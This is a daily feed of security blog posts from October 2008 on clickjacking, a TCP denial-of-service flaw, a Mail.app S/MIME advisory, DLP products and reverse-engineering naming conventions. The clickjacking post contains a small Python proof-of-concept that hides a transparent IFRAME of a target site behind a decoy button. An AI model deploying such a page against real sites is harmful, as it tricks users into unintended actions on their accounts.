Monday, October 6, 2008

Spliced feed for Security Bloggers Network

Clickjacking and Flash [GNUCITIZEN]

Posted: 06 Oct 2008 03:22 AM CDT

I heard of clickjacking a couple of weeks back when the media blast started. At that time I had only a vague idea what it was, and just recently I saw some PoCs coming out that show how it works in practice.


Clickjacking, if I may categorize it, falls into the category of GUI attacks. I associate it with the focus-stealing attack, which allows attackers to steal any file from the disk as long as they trick the victim into typing enough characters. OK, this is not a razor-sharp exploit, but it is an exploit nevertheless.

In essence, the clickjacking technique allows attackers to trick the victim into clicking on areas of disguised HTML elements, such as an IFRAME preloaded with, say, your Facebook account page. If nothing else, clickjacking is the killer of most anti-CSRF techniques.
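
A minimal sketch of the trick (everything here is hypothetical: the target URL, the layout, the bait): the attacker's page stacks an invisible IFRAME over a decoy button, so the victim's click lands on the framed site's real UI.

    # Hypothetical clickjacking PoC server: serves a page where a
    # transparent IFRAME (opacity:0) sits on top of a decoy button.
    # The victim thinks they click "Win a prize!" but actually clicks
    # whatever the framed page renders at that spot.
    from http.server import BaseHTTPRequestHandler, HTTPServer

    PAGE = b"""<html><body>
    <button style="position:absolute; top:60px; left:60px;">Win a prize!</button>
    <iframe src="http://victim.example/settings"
            style="position:absolute; top:20px; left:20px;
                   width:400px; height:300px; opacity:0;"></iframe>
    </body></html>"""

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(PAGE)

    if __name__ == "__main__":
        HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()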

I haven’t been thinking about clickjacking at all. I mean, the attack is quite obvious and the potential for damage is there. However, this morning when I woke up, an interesting question started to circulate in my head: what is Adobe’s deal? After all, Adobe are the ones who asked Jeremiah and rsnake to cancel their OWASP presentation. The answer came quite quickly and naturally.

The simple truth is that Adobe are worried about the clickjacking technique because Flash’s current, and even future, much-enhanced security model relies on user interactions, i.e. clicks performed by the user. Therefore, today attackers can trick the user into allowing the microphone to capture the sound in the room where the victim’s equipment is located. They can use clickjacking for that! But there is more.

If you have been following the development of the Flash platform, you are probably aware that Flash will soon become practically the most powerful web tool out there. Seriously, Adobe are revolutionizing the way we interact with the Web. Not only will Flash support a primitive P2P streaming protocol (I need to think of something malicious to do with that…), but it will also allow users to open and save files from and to their local disk. The only catch is that this feature is available via the FileReference class, whose methods cannot be called directly; instead, the developer needs to bind them to onclick events.

IMHO, this security model is not bulletproof. The potential for abuse is obvious, and since clicks are the driving force of Flash’s future security model, clickjacking is what comes to mind if you want to abuse them. Perhaps in the future we might even be able to connect to TCP sockets, as long as the user clicks?

In conclusion, clickjacking is not a killer problem and it does not break the Web, well, not entirely. However, the clickjacking problem is hard to solve. IMHO, it is even harder to solve than any overflow you may have to deal with. Why? Because we are dealing with user interaction and graphic-design-related problems. The solution has to be so clean that it doesn’t break half of the Web.

FAIL! [securosis.com]

Posted: 06 Oct 2008 12:00 AM CDT

Say you are an online retailer: do you ever check to make sure your web site functions? If you don’t, start! Here are a few examples of why this is a good idea:

Failure 1: When you email a promotional flyer to your user community, but the promotional form rejects the user’s login because the email account you mailed the flyer to cannot be found in your database, odds are your sales response is not going to meet expectations.

Failure 2: When your online order form rejects purchases because the zip code does not match the state, but your web form lacks an entry field for the state, odds are your sales response is going to be nil.

State of confusion ...

Failure 3: When your customer wants to do you the courtesy of pointing out some flaws that may limit revenue, the form you ask the customer to fill out should actually exist. Presenting potential customers with a FAQ when they click a form submission link is in essence telling them ‘RTFM!’, and a great way to alienate your would-be buyers.

When you are in a highly competitive market segment, you really want to check your web site for obvious bugs before the last day of the quarter.

Wake up Parallels!!!

-Adrian

P.S. I should say that if it were not for an exceptionally nice sales rep named Melinda, this effort would have been abandoned.

Survey Results Unsurprisingly in Favour of Company That Paid for Them [Sunnet Beskerming Security Advisories]

Posted: 05 Oct 2008 05:18 PM CDT

Any time that the results of a new survey are announced, especially a survey that seems to paint a company in a positive light, questions must be asked as to who is responsible for the funding and setup of the particular survey or analysis. Generally, it is the company being reported on favourably that is funding the survey, even if the survey is being run by a nominally independent organisation.

This pattern of behaviour seems to be most obvious in Information Technology, where the survey and associated analysis seem to be the method du jour for companies to gain favourable press and to make it look like an independent source is painting them in a positive light. If a business purchasing decision can be based on such a report, then it is all the better for the original company.

The Harrison Group recently ran a survey, paid for by Microsoft, that found that companies running incorrectly licenced versions of Windows were more likely to run into problems such as system failures and loss of customer data. With Microsoft paying for the survey, was any different result really to be expected?

With unlicenced systems almost certainly using perfect digital copies of licenced software, why should there be any difference in how stable the systems are? One of the suggestions put forward in the article is that whoever is responsible for the copied software has slipstreamed something malicious in with it. It is more likely that a company unwilling to spend funds on licenced software would also be unwilling to spend funds on properly maintaining its systems, and so would be more likely to encounter problems stemming from poor maintenance than from just having unlicenced software.

In order to see a result like that, though, we are going to have to wait until a system administration service provider runs their own set of surveys.

Litmus Test for Metadirectory vs. Virtual Directory [Matt Flynn's Identity Management Blog]

Posted: 05 Oct 2008 04:52 PM CDT

No, I don't want to re-open a debate. Just floating someone else's idea...

I already mentioned some of the things I overheard at DIDW 2008 and the panel titled Lessons From Successful Virtual Directory Deployments. I was looking at my notes today and wanted to float an idea that one of the panelists offered (I think it was Divya Sundaram of Motorola). He said (paraphrased):
If you front-end data (or a data store) that you don't own (or don't have control of), then you need to replicate/sync data (instead of virtualizing the view).
Is that a good general litmus test for the Metadirectory vs. Virtual Directory debate?

As I've said numerous times, I can think of clear use-cases for both scenarios. But this might be a good general rule of thumb. BTW, the panel seemed to unanimously agree that both capabilities are useful and should be part of the toolbox.

ROFL [Random Thoughts from Joel's World]

Posted: 05 Oct 2008 03:52 PM CDT


Saw this today, had to post it.  Man that's awesome.

BTW -- Star Wars.



Rewriting the Code [IT Security: The view from here]

Posted: 05 Oct 2008 08:31 AM CDT

"Can you take a quick look at this please, Rob?" - thus spake the CTO of the company. The 'Group' of which our company is the shining star (i.e. highest returns) has been trying to put together what they refer to as a 'Code of Connection' such that everyone who attaches to our Global WAN comes under the same set of rules. Sounds like a reasonably simple task you might think, unless of course you had ever had to write one yourself... I, however, did not have to write one, merely cast a critical eye over the work in progress before me, and comment on it.

Half an hour later I emerged from my task, confused and rubbing my eyes. I had a thought which I am positive anyone practicing security today will have experienced - "there's a lot of words there, but I'm not certain that everything's been covered, I have no proof..."

Basically, I had no idea what was required from the Code, because I didn't know what it was trying to be. So a quick Google search revealed what I was looking for: the difference between Policies, Standards and Procedures.

This is when the trouble started. I went back to the CTO, with a handful of notes which I'd put together in PowerPoint and printed off. Having explained the differences, I was asked to pull everything out of the Code of Connection that wasn't Policy, and send it back to the Group IT Security team, and the CISO.

I called the CISO the following afternoon to run this by him, got his broad approval, and got on with the task at hand. I spent three days putting things into tables, deleting headlines and putting them back in, writing bits, deleting them again, and generally getting into a mess.

Realising that I needed a better reference, I went back to basics, and pulled out the Group Policy. To my surprise, I noticed that the Group Policy was actually called "Group IT Standards", a collection of Standards from across the group, all in one place.

So now I have to go back to the CISO and tell him the Group Policy needs a rewrite before I can write a Code of Connection. I think I may have just created a monster. I'll let you know how it goes...

Friday Summary [securosis.com]

Posted: 03 Oct 2008 03:00 PM CDT

The Securosis team is attempting to regroup and prepare for a busy Q4. It took three full days, but I am now fully migrated into the Mac Universe. I can finally engage on a couple research projects. Rich has left HQ in search of coffee, quiet and a security muse while he catches up on writing projects and white papers. But even though we have a short term ban on travel and conferences, there is a lot to talk about. Here is our summary of this week’s blogs, news and events.

Webcasts, Podcasts, and Conferences:

* This week on Network Security Podcast 123, guests Robert "RSnake" Hansen of SecTheory and Jeremiah Grossman of WhiteHat Security discuss their new clickjacking exploit.

Favorite Securosis Posts:

* Rich: Impact of the Economic Crisis on Security. It doesn’t matter if you are a vendor or a practitioner; we’ll feel the effects of this crisis, but in a predictable way.
* Adrian: Email Security. It’s getting cheaper, faster and easier to implement, but with some potential privacy issues depending on how you go about it.

Favorite Outside Posts:

* Adrian: Brian Krebs’ post on lawsuits against ‘Scareware Purveyors’. Finally. Infecting someone’s machine with spyware and using it as a marketing and sales conduit is akin to stealing in my book. Now if they would only go after the purveyors of this scare tactic.
* Rich: Fyodor explains (probably) the looming TCP attack. Fyodor, creator of Nmap, does an excellent job of explaining how the big TCP DoS attack likely works.

Top News:

* The recovery bill. Lawmakers look panicked, and the market goes down every time they get close to a ’solution’.
* The TCP Denial of Service attack. Nothing to panic about, and we’ll write more on it, but very interesting.

Blog Comment of the Week:

Chris Pepper’s comment on Rich’s “Statistical Distractions” post:

[snip]... I refuse to use unencrypted email, but that's to the SMTP/IMAP/POP/webmail server. But for email we have to keep in mind that the second hop — to the destination SMTP server — is almost always plaintext (unencrypted SMTP). So it's more about protecting the account credentials than about protecting the email itself, but someone gaining full access to my whole multi-gigabyte mail store would really really suck. …[/snip]
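
A quick aside: you can at least check whether a given destination mail server offers TLS on that second hop. A tiny sketch, with a hypothetical MX hostname:

    import smtplib

    # Connect to the destination MX and ask, via EHLO, whether it
    # advertises the STARTTLS extension (no guarantee senders use it).
    server = smtplib.SMTP("mx.example.org", 25)
    server.ehlo()
    print("offers STARTTLS:", server.has_extn("starttls"))
    server.quit()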

Now, I am off to The Office for the Securosis weekly staff meeting. We hope you all have a great weekend.

-Adrian

Why The TCP Attack Is Likely Bad, But Not That Bad [securosis.com]

Posted: 03 Oct 2008 02:36 PM CDT

There’s been a bunch of new information released over the past few days about the potential big TCP denial of service flaw. The three most informative posts I’ve read are:

  1. Fyodor’s discussion of either the same or a similar issue.
  2. Richard Bejtlich’s overview.
  3. Rob Graham’s take on the potential attack.

Here’s what I think you need to know:

  1. It is almost certainly real.
  2. Using this technique, an attacker with very few resources can lock up the TCP stack of the target system, potentially draining other resources, and maybe even forcing a reboot (Could this trash a host OS? We don’t know yet.).
  3. Anything that accepts TCP connections is vulnerable. I believe that means passive sniffing/routing is safe.
  4. The attack is obvious and traceable. Since it uses TCP and creates fully open connections (not UDP), spoofed/anonymous attacks don’t seem possible.
  5. Thus, I’d be more worried about a botnet that floods your upstream provider than this targeted attack.
  6. This is the kind of thing we should be able to filter, once our defenses are updated (a rough detection sketch follows this list).
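
Since the attacker has to complete real TCP handshakes, the simplest tell is a single source IP holding an unusual number of established connections. A rough detection sketch, assuming the psutil library is available and an arbitrary threshold:

    # Count established TCP connections per remote IP and flag heavy
    # sources. The threshold is made up; tune it for your environment.
    import collections
    import psutil

    THRESHOLD = 100

    def suspicious_sources():
        counts = collections.Counter(
            conn.raddr.ip
            for conn in psutil.net_connections(kind="tcp")
            if conn.status == psutil.CONN_ESTABLISHED and conn.raddr
        )
        return {ip: n for ip, n in counts.items() if n > THRESHOLD}

    if __name__ == "__main__":
        for ip, n in suspicious_sources().items():
            print(ip, n, "established connections")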

In other words: a bad attack, but a moderate risk. That said, there are aspects of this that still concern me and that we need to keep in mind:

  1. We don’t know if our assumptions are correct. This could be a different, and much more serious, technique. Such as something spoofable. Unlikely, but possible.
  2. Nothing says a botnet can’t use this, and thus make filtering and tracing a real pain. Imagine a botnet rotating this attack technique around to different nodes. It could support more efficient botnet attacks, which could then drop back to regular flood mode if the more efficient direct mode doesn’t seem to be working.
  3. We don’t know that it doesn’t do something to the router infrastructure or to passive monitoring. Again, it’s unlikely based on the information released, but I’d hate to dismiss the concern until we know more.
  4. Until there’s some sort of fix, the Defcon network and coffee shops near universities are really going to suck.
  5. Until this is fixed, small businesses and individuals are the most likely to suffer. An enterprise might be able to detect and drop an attack like this, but individual users and small businesses don’t have the resources. Get ready for vendor pouncing.

-rich

Apple Mail.app security advisory [EnableSecurity]

Posted: 03 Oct 2008 10:04 AM CDT


The newsletter issued yesterday included an advisory on Mail.app’s insecure storage of S/MIME-encrypted email drafts on the mail server. The main problem is that people making use of S/MIME expect encryption to protect them from a snooping mail server, and the default “store drafts on mail server” option does not respect this.

At this stage Apple has not released anything to address this issue, because it might require architectural changes. I understand that; however, publishing a solution to this issue does not have to mean a patch. This is why I’m publishing the advisory and the solutions below, so that users who are concerned about this can mitigate it.

If you would like to stick to Mail.app:

  • Go to the Preferences and select the account from the accounts tab
  • Select the “Mailbox behaviors” tab
  • Uncheck the option “Store draft messages on the server”

Otherwise, some other email clients are not vulnerable because they encrypt draft emails before they are sent to the server.


Safend Data Leakage Prevention Solutions [Security Provoked]

Posted: 03 Oct 2008 09:24 AM CDT

Susan Callahan, senior vice president of business development and marketing at Safend, is seeing a change in trends. In the past, corporations were looking to check a box on compliance. Now, data is their most important asset. "CEOs are no longer looking to fill a checkbox; they now want a granular solution," she said. According to a recent study by IDC, 60 percent of all corporate data is accessed via an endpoint. As the perimeter continues to expand, encryption alone is no longer enough protection for company data.

Safend's solutions offer a fix for data leakage prevention. The acronym DLP has several expansions depending on who you ask: data loss prevention or data leakage prevention, with related acronyms such as information leak detection and prevention (ILDP) and information leak prevention (ILP). Callahan said, "How much of DLP is a product versus a process? It's such a complex problem to protect data. It's a process or methodology that needs to be adopted within a corporation. Technology enables you to accomplish it. If there is no way of enforcing it, it's not going to happen. Technology is the means to an end."

Safend offers three solutions to address DLP and regulatory compliance: Safend Auditor, Protector and Reporter. These solutions protect an organization's data in motion, data in use and data at rest. Safend Auditor provides detailed audit logs of all devices currently or historically connected to your endpoints. You can download an evaluation copy of Safend Auditor at Safend.com for a free trial; it will reveal how many USB sticks have been used on your machine. It also has a client list utility for IT admins to see who is connected with what devices on the network. According to an OEM partner's market survey, 72 percent of people within a corporation use at least one USB stick, and many use up to seven different USB sticks. It's important to know who and what devices are connecting to your environment. Safend Auditor is built to support regulatory compliance with HIPAA, SOX, PCI and state privacy laws.
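
To get a feel for what this sort of audit can surface, here is a toy sketch (my own, not Safend's implementation): Windows records every USB storage device ever attached under the USBSTOR registry key, so even a few lines of code can enumerate the history.

    # List USB storage devices Windows has seen, from the registry.
    # Windows-only; run with sufficient privileges to read HKLM.
    import winreg

    USBSTOR = r"SYSTEM\CurrentControlSet\Enum\USBSTOR"

    def usb_storage_history():
        devices = []
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, USBSTOR) as root:
            subkey_count = winreg.QueryInfoKey(root)[0]
            for i in range(subkey_count):
                devices.append(winreg.EnumKey(root, i))
        return devices

    if __name__ == "__main__":
        for device in usb_storage_history():
            print(device)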

Safend Protector guards against data breaches by applying granular security policies over removable storage devices. Safend Protector offers endpoint monitoring, device identification and blocking based on administrator-defined policies with automatic data encryption. It protects all ports including USB, WiFi, Bluetooth and all removable storage devices. Safend conducted an endpoint security and data leakage threat survey that included responses from enterprise executives and IT administrators. Nearly 60 percent of all respondents were unaware or unsure of how many devices connect to their corporate endpoints. Also, nearly 25 percent have no policies for endpoint and port security at all.

Safend Reporter is an add-on module that provides reporting and analysis on security incidents and operations status. The tool reports on data accessed by removable storage devices and wireless ports that further enables data security and compliance.

Callahan recounted an event where a student used a key logger to get access to his teacher's password. He then had access to the answers to his teacher's exams before each test. When the student performed exceedingly well, to the point of writing his answers almost word for word from the teacher's answers, the compromise was discovered. "If kids can do that with a key logger, imagine what can be done to steal company secrets."

"With the average cost of a data breach being $6.3 million per company, it's too expensive to leave to chance," said Callahan.

EnableSecurity Newsletter 0x0001 [EnableSecurity]

Posted: 03 Oct 2008 09:17 AM CDT


The first issue of the newsletter is out! Included are the following articles of interest:

  • Upcoming EnableSecurity projects
  • Events: RSA Europe 2008
  • New advisory: Apple’s Mail.app stores your S/MIME encrypted emails in clear text
  • Surf Jack updates and what is Surf Jack anyway?
  • Cross Site Scripting on your non-sensitive website?
  • Your magnetic stripe credit card is going away
  • Does your software check for updates? You might be in trouble…
  • Selected Security news

Some of these articles will eventually find their way to this blog or other locations. Others will remain exclusive to the newsletter.

To get access to the newsletter, simply send an email to newsletter@enablesecurity.com.


Leveraging the Work of Others [un-excogitate.org]

Posted: 03 Oct 2008 06:20 AM CDT

When working on an information risk assessment, one of the first and most important tasks is to understand what assets we’re trying to protect, and what it would cost the business if those assets had their confidentiality, integrity or availability impacted. In most circumstances these aren’t questions that can be answered by IT or by the information security people, but by the business themselves. Unless the organisation is itself an IT organisation, an impact upon those assets doesn’t normally hit IT directly but the business. Impacts vary depending on the assets in question; some assets aren’t much impacted when they lose confidentiality or integrity but are heavily impacted when they are unavailable.

So apart from asking the business what they believe these impacts are, what other ways can be used to gather this information? Well, if you’re fortunate enough, you might be able to gather it from other sources, such as those fantastic people whose job it is to manage and deliver services to the business. The same people whose responsibility it is to monitor SLAs. If these people are monitoring service levels closely (such as transactions within a commerce application), then they will probably have metrics such as: this application performs x transactions per day (or month, or year, whatever).

All of a sudden a loss of availability isn’t just a loss of service, but a quantifiable value. If this application server goes down, then you are losing x transactions per day. If each transaction provides on average $y profit, then it gets even better. You get the picture. But not only do you get the picture; your stakeholders can now be given a fairly clear indication of what a loss of availability will cost them over a specific time period.
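
As a back-of-the-envelope sketch (all figures invented for illustration), the arithmetic is trivial once the SLA people hand you the metrics:

    # Turn SLA metrics into a dollar figure for an availability outage.
    TRANSACTIONS_PER_DAY = 12_000   # from service-level monitoring
    AVG_PROFIT_PER_TXN = 4.50       # average profit per transaction, $

    def outage_cost(hours_down):
        """Estimated profit lost while the application is unavailable."""
        per_hour = TRANSACTIONS_PER_DAY / 24 * AVG_PROFIT_PER_TXN
        return per_hour * hours_down

    print("4-hour outage costs roughly $%.2f" % outage_cost(4))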

While this scenario is great for looking at the cost of impacts against availability, what does it do for loss of confidentiality or integrity? Not a lot, unfortunately. I just felt like giving big-ups to those people at my work who have been doing a great job of compiling more metrics about all of our applications than I can point a finger at!

Security Provoked video episode 10 [Security Provoked]

Posted: 02 Oct 2008 07:52 PM CDT

In which Robert discusses tattoos and why he feels a little sorry for Kevin Mitnick, and Brad Smith, director of the Computer Institute of the Rockies, drops in to talk about his trip to the COSAC conference.

Video review of Napera N24 by David Strom [Napera Networks]

Posted: 02 Oct 2008 03:38 PM CDT

David Strom, former editor-in-chief of Network Computing and reviewer at large, just posted a great review of the Napera N24 on WebInformant.tv.


Protecting Your Small Business Network with Napera’s Appliance

An actual meeting held via iChat [Random Thoughts from Joel's World]

Posted: 02 Oct 2008 02:36 PM CDT

Earlier this week, three of my coworkers and I held a four-way iChat video conference as a meeting. It worked great.

Of course, as bandwidth decreases the video quality is dynamically reduced; still, the four of us had a face-to-face video/audio chat for over an hour about some code testing. I've been using iChat for one-on-one meetings for a couple of years now, but I never had the opportunity to have a call with four people (never had the bandwidth to sustain it before), and now that I have FiOS... awesome.



MindshaRE: Naming Conventions [DVLabs: Blogs]

Posted: 02 Oct 2008 01:44 PM CDT

Posted by Cody Pierce

It is my belief that reverse engineering is one part patience, one part experience, and a whole lot of organization. OK, maybe that is a bit of an exaggeration, but organization is essential to reversing. Having a decent naming convention you stick to not only helps you in the short term, but also six months down the line when you or your co-workers look at your IDB. There is no "right" naming convention, but everyone should at least have one they use regularly. So today in MindshaRE we will cover what I use to name functions, variables, and other information you might find in a binary.

MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history.

There are several reasons to actually use a naming convention. It makes your IDBs easier to read (for everyone), helps you organize functions, variables, and basic blocks, and in general makes your IDBs look more professional, among other things. If you ever read this blog, you know I try really hard to make everything as simple and clear as possible.

Naming convention standards have been debated ad nauseam by developers since programming languages were created. For some reason everyone insists that their opinion is obviously the best. As long as you, and anyone you interact with, can read your labels and glean the intended information from them, you win. Besides readability, one of the most important aspects of a good naming convention is simplicity. If it's too complex you won't use it. A naming convention must become a natural extension of the way you reverse.

My personal naming convention is a mixture of Hungarian, UpperCamelCase, and traditional C style. I do this because I need type information, readability, and flexibility. I tend to make my labels longer and descriptive because it's easier to understand.

I have broken down my naming conventions into their respective categories. Let's jump right in.

Functions:

I label my functions more than anything. You have three different views of functions which you'll look at almost every day. Viewing the top of a function, calling a function, or looking at the function window will display the names you have given them. IDA starts you out with the ambiguous "sub_xxxxxxxx" moniker. This is fine but hardly a description of what the function does.

When I have reversed a function I will give it an UpperCamelCase name, trying to be as descriptive as possible. For instance, "sub_7E4D5E88" might become "ReadFromFile". One drawback of this method is that you have to be mindful of any import names that may conflict. IDA will let you use such a name, but might assign the import's prototype information to the function. If I wanted to call this function "ReadFile" I might just call it "MyReadFile".

Another common occurrence is to simply append "Wrapper" to functions. In the above example the caller may be renamed to "ReadFromFileWrapper". This can become a little cumbersome when you get 4 wrappers deep. ReadFromFileWrapperWrapperWrapperWrapper just doesn't have the same ring to it. In that case I will just shorten to "ReadFromFileWWWW".

Arguments/Locals:

For arguments and locals I use Hungarian notation for its data type definitions. This seems to be the most descriptive method for associating needed type information with a variable name.

In general, arguments and locals are named in similar fashion. The only difference is that I will prepend "arg_" to an argument's name in a function. This lets me easily differentiate between the two. If you need position information as well, you can append it to the original, making a name like "arg0_" or "arg_4_", whichever is more natural to you.

Let's pretend we have a local integer that contains a count. Using Hungarian notation I would call it "dwCount". To me this specifies its size (I'm assuming dword ints, of course) and its purpose. If this were a pointer, I'd prepend the name with a "p" to get "pdwCount". I realize people may groan at how this looks. That's fine, but looking at this label I can instantly tell we have a pointer to a 32-bit integer being used as a count. If this were an argument, we would use "arg_dwCount" or "arg0_dwCount". To satisfy those who may not always be on 32-bit platforms, you could also label this by size: "i64Count".

If we also need the signedness of the data type, we can add that as well. Sometimes the signed distinction is unnecessary, but I favor more information rather than less. Our above example of a dword integer would be "udwCount" or "sdwCount". And, admittedly, the ugliest name, "pudwCount", denotes a pointer to an unsigned dword.

Here is a list of the data types I often encounter.

    b   Byte     bCount
    w   Word     wCount
    dw  Dword    dwCount
    p   Pointer  pCount, pwCount, psdwCount
    sz  String   szName
    a   Array    aNames
    s   Struct   sNames

Alternatively, you could also use the C identifiers char, short, or long if you want. Whatever works for you.
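
Just to make the scheme concrete, here is a toy helper (my own invention, nothing to do with IDA itself) that assembles names according to the convention above:

    # Build variable names: optional "arg_" prefix, optional "p" for
    # pointers, optional sign marker, then the Hungarian type tag.
    PREFIXES = {"byte": "b", "word": "w", "dword": "dw",
                "string": "sz", "array": "a", "struct": "s"}

    def make_name(base, ty, pointer=False, signed=None, arg=False):
        name = PREFIXES[ty] + base
        if signed is not None:          # add sign info only when needed
            name = ("s" if signed else "u") + name
        if pointer:
            name = "p" + name
        if arg:
            name = "arg_" + name
        return name

    assert make_name("Count", "dword") == "dwCount"
    assert make_name("Count", "dword", pointer=True, signed=False) == "pudwCount"
    assert make_name("Count", "dword", arg=True) == "arg_dwCount"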

Globals:

Global data varies. It could be a handle, a jump table, a global variable or hundreds of other things. With that said, you may need to work on a case-by-case basis. Normally, however, I will use the C ALL_UPPERCASE_GLOBAL nomenclature. Since I am used to this for global variables, it works well for me. If we had a jump table that handled packet processing, we could name it "PACKET_HANDLER".

Branches:

Branches are your intraprocedural jumps to other basic blocks in the function. IDA names these "loc_xxxxxxxx". Oftentimes we want to rename this, for instance if we know the branch is a basic block that returns from the function.

For these instances I stick to the old C syntax of lower_case_underscore names. It helps me differentiate between functions and basic blocks easily. It also seems to be more readable in certain cases and stands out less. Let's pretend the basic block currently named "loc_7E4D5F56" returns true. I would label it "return_true". If it returns false, I'd go with "return_false". Some other common labels are "check_null", "check_counter", "begin_for_loop", and "throw_exception". These labels are useful in explaining basic blocks at a single glance.

Marks:

Bookmarks are used to save a particularly interesting location. In general these can be free-form and as descriptive as possible. A good label will tell you why the location is important. Examples I often use are "read tcp socket data" or "read from configuration file", keeping everything lower case and forgetting punctuation. I also have the ubiquitous "im here" or "here" mark indicating my last position in the IDB.

Comments:

Comments should be readable and generally a single line. To me it's strange to see multiple lines of comments on a single address. You should insert any data you may have, or references to other addresses if need be. Remember, any address IDA has a reference for that you put in a comment can be followed in the IDA GUI.

Creating names using a convention you are comfortable with helps everyone. Try to find something you feel is beneficial and it will become second nature. I don't know how many times I've gone back to an IDB and not known what was going on because I didn't name things properly. Forget trying to open someone else's IDB.

I would be very interested in hearing about the conventions you personally use. I certainly do not think my way is bulletproof or the absolute best. Everything can be improved and expanded. Please leave a comment if you have some suggestions, maybe one day everyone will use a similar style! In the very unlikely case people actually agree on a naming standard I'll draft up a document with more detail that can be used by everyone.

Hope you enjoyed this week's MindshaRE.

-Cody

Let’s Play: Name That Regulation! [securosis.com]

Posted: 02 Oct 2008 11:05 AM CDT

What do you think our new financial law will be? What piece of legislation will be enacted by our government to protect us from the greed that caused this current financial crisis? Last time it was Sarbanes-Oxley. Who will be the poster child for our current financial crisis? Who will be the “Keating 5” this time around? You know it is coming. It has every other time greed has torpedoed our economy. And it is an easy target for any politician when there is only one side to an issue. I mean, how many voters are pro-financial crisis?

I am actually asking this as a serious question. I am really at a loss for a plan of action that would be effective in stopping financial institutions from making bad loans, or for how the government could effectively regulate and enforce one. The typical downsides to bad business practices (falling stock value and bankruptcy) have been nullified by mergers and government funding. In this case the blind greed was evident from top to bottom, and not just within a company or region, but across the entire industry: from financial institutions to buyers and most of the parties in between. Yes, lenders skirted process and sanity checks to be competitive, but it took more than one party to create this mess. Buyers wanted more than they could afford and eagerly took loans that led to financial ruin. Real estate agents wrote the deals as quickly as they could. Mortgage brokers looked for any angle to get a loan or re-fi done. Underwriters were in absentia. Appraisers "made value" to keep business flowing their way. You name it, everyone was bending the rules.

So that really is the question on my mind: what will the new regulation comprise? How do you get businesses to say ‘no’ to new business? How do you keep competitive forces at bay to prevent this type of activity from happening again? My guess (and why I am blogging about it) is that enforcement of this yet-to-be-named law will become an IT issue. As with Sarbanes-Oxley, much of the enforcement, controls and systems, along with the separation of duties necessary to help with fraud deterrence and detection, will be automated. Auditors will play a part, but the document control and workflow systems that are in place today will be augmented to accommodate it.
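
To illustrate the kind of automated separation-of-duties check I mean, here is a toy sketch (the events and the rule are mine, not from any actual law): flag any loan that the same person both originated and approved.

    # Naive separation-of-duties audit over a hypothetical event log.
    loan_events = [
        {"loan": "L-1001", "action": "originate", "user": "alice"},
        {"loan": "L-1001", "action": "approve",   "user": "bob"},
        {"loan": "L-1002", "action": "originate", "user": "carol"},
        {"loan": "L-1002", "action": "approve",   "user": "carol"},
    ]

    def sod_violations(events):
        by_loan = {}
        for e in events:
            by_loan.setdefault(e["loan"], {})[e["action"]] = e["user"]
        return [loan for loan, acts in by_loan.items()
                if "originate" in acts
                and acts.get("approve") == acts["originate"]]

    print(sod_violations(loan_events))   # ['L-1002']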

Let’s play a game of ‘trifecta’ with this … put down the name of the company you think will be the poster child for this debacle, the name of the politician who will sponsor the bill, and the law that will be proposed. I’ll go first:

Poster Child: CountryWide

Politician: John McCain

Law: 3rd party credit-worthiness verifications and audit of buyers

If you win I will get you a Starbucks gift card, or drinks at RSA 2010, or something.

-Adrian

Are vendors holding back IT security progress? [StillSecure, After All These Years]

Posted: 02 Oct 2008 10:48 AM CDT

I just read an article by Phil Muncaster on computing.co.uk. It details a keynote speech by Neil MacDonald, VP of Gartner Research, at this week's Gartner Security Summit 2008. I was not at the event, so I can't report on it first hand, but taking Phil's article at face value, it seems that Neil was blaming security vendors for security professionals not being able to keep pace with the changing face of security threats. To me this is like blaming Smith & Wesson for not making better guns for police officers. The fact that the bad guys are doing bad things somehow doesn't enter the equation. IT security progress is being held back because the threats we are facing are growing more complex and sophisticated! Let's not confuse the people trying to help with the solution with the people causing the problem.

On top of this, there are a lot of security vendor products out there that are not being used. I have yet to speak to an IT security professional who has the budget to get all of the security tools, training and services they need. Overall, the security industry is constantly trying to make 30 cents out of a quarter. In an environment where the bad guys are making lots of money, resource-starved security professionals are waging this war with one hand tied behind their back. It is not a lack of security tools; it is a lack of resources and money to buy and deploy them. Don't underestimate the deployment part of it. How many times have we seen hard-won budget dollars spent buying security products that never get fully deployed?

That is not to say that security vendors are without blame.  Security products are too hard to use, don't play nicely with each other and we don't do a good job of arming security professionals with compelling value propositions to sell the solutions up the chain.


How to entice older Australians into adopting Online Financial Services [Online Identity and Trust]

Posted: 02 Oct 2008 01:46 AM CDT

by Francis Castello, Product Manager, Identity and Authentication Services - APAC Region


According to recent research conducted by Datamonitor, around 27 per cent of 2,000 respondents would never arrange any financial product online (ref. Aussies fear online fin services). This percentage equates to around 4.2 million Australians.
The report noted that "Despite the introduction of more comprehensive security measures such as two factor authentication by the banks, there is still a significant proportion of consumers that does not use internet banking due to concerns about security." According to Datamonitor financial services analyst Petter Ingemarsson, the issue boils down to "perceived security" rather than the actual security safety nets in place.


One group that represents a particular challenge in converting to the new medium is the over-45 age category, where there is a major drop-off in the medium's acceptance. It's this older consumer contingent that I'd like to address in this blog post.


So what do banks need to do to address this particular challenge? Now, I don't purport to be a psychological expert, but it seems to me that if we revert to some simple problem-resolution basics, we're on our way to finding a solution. Without conducting any detailed analysis, I think it would be fair to attribute the resistance of older consumers to embracing the online medium to two key contributing factors. The first is a fear of new technology. In general, the older we get, the more resistant we seem to become to adopting new technologies. The second factor is a fear of the insecurity associated with the Internet. The constant attention the topic of 'online identity theft' enjoys in the media does a great job of propagating the message of insecurity associated with transacting online.


Faced with this challenge, one might also ask, 'why bother with the older consumer segment anyway?' That's what I thought originally, until my 65-year-old mum approached me one day and asked, "Son, I want to get connected to this Internet thing; can you help me?". And we're talking here about someone who struggled with the unconventional new-age shape of her brand new bread toaster! Clearly the desire is there. From that point I was convinced. Yes, even the over-45s will convert, but the rate of success will depend upon the approach and solution. So how can we address this challenge?


In my opinion, the solution requires the following three key elements:

1. The security solution needs to offer something tangible for the consumer (something the consumer can see, touch, etc.);
2. The security solution must be simple and bullet-proof; and
3. The security solution needs to be offered via a targeted marketing campaign.


